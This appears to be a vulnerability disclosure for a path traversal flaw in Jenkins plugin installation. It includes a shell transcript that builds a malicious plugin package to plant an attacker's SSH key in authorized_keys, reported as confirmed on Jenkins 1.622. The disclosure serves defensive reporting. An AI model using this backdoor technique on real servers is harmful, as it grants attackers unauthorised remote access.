Submitting as delegate for a Cisco pen-testing team
A vulnerability in the package installation process of Jenkins could all an authenticated, remote attacker to affect a path traversal attack.
The vulnerability is due to unsafe unpacking operations. An attacker could exploit this vulnerability by crafting a malicious plugin package and installing it themselves, or tricking a victim to install it on their Jenkin's instance. An exploit could allow the attacker to write or overwrite files with elevated privileges, which could allow backdoor access, or a denial of service (DoS) condition.
Headline: Path traversal during Jenkins plugin installation
CWE Tags: CWE-25, CWE-541
Jenkins allows administrators to install plugins that extend the core
functionality of the system. Plugins are distributed in a single-file package
(essentially a 'zip'/'jar' file) that is expanded at installation time. The
process that expands plugin packages during installation contains a path
traversal vulnerability that allows a malicious plugin package to write files to
arbitrary locations on the underlying filesystem. This includes creating new
files and directories and overwriting existing files.
For example, a plugin package could overwrite Jenkins system configuration files
or cryptographic secrets. It could create new users or jobs by writing new
user/job configuration files. It could even create/overwrite an OS user's
'.ssh/authorized_keys' file, thus creating a backdoor that may allow the
attacker to SSH into the Jenkins server.
Consider the following shell transcript illustrating how an attacker could
create a malicious package that installs an attacker controlled SSH key.
$ mkdir -p .ssh one/two
$ ssh-keygen -t rsa -b 1024 -N "" -C jenkins -f .ssh/jenkins.id_rsa
Generating public/private rsa key pair.
Your identification has been saved in ./jenkins.id_rsa.
Your public key has been saved in ./jenkins.id_rsa.pub.
The key fingerprint is:
The key's randomart image is:
|. o .|
|. o =.o|
|. .S+ oo|
|. . .oo .|
|.. o .. o|
|o. .o .. o|
|oo.. .... E.|
$ ln -s jenkins.id_rsa.pub .ssh/authorized_keys
$ jar cvf ssh_backdoor.hpi -C one/two/ ../../.ssh/authorized_keys
adding: ../../.ssh/authorized_keys(in = 221) (out= 198)(deflated 10%)
Note, the 'ssh_backdoor.hpi' plugin described above has been confirmed to
successfully create an SSH backdoor on Jenkins 1.622 running on Ubuntu Linux
(default installation via aptitude). Obviously, differences in installation
paths and filesystem layout could affect the applicability of this example to
Clearly the behavior described above should not be permitted. To protect
against such attacks, Jenkins developers should ensure that plugins are
unpackaged and installed in isolated portions of the filesystem.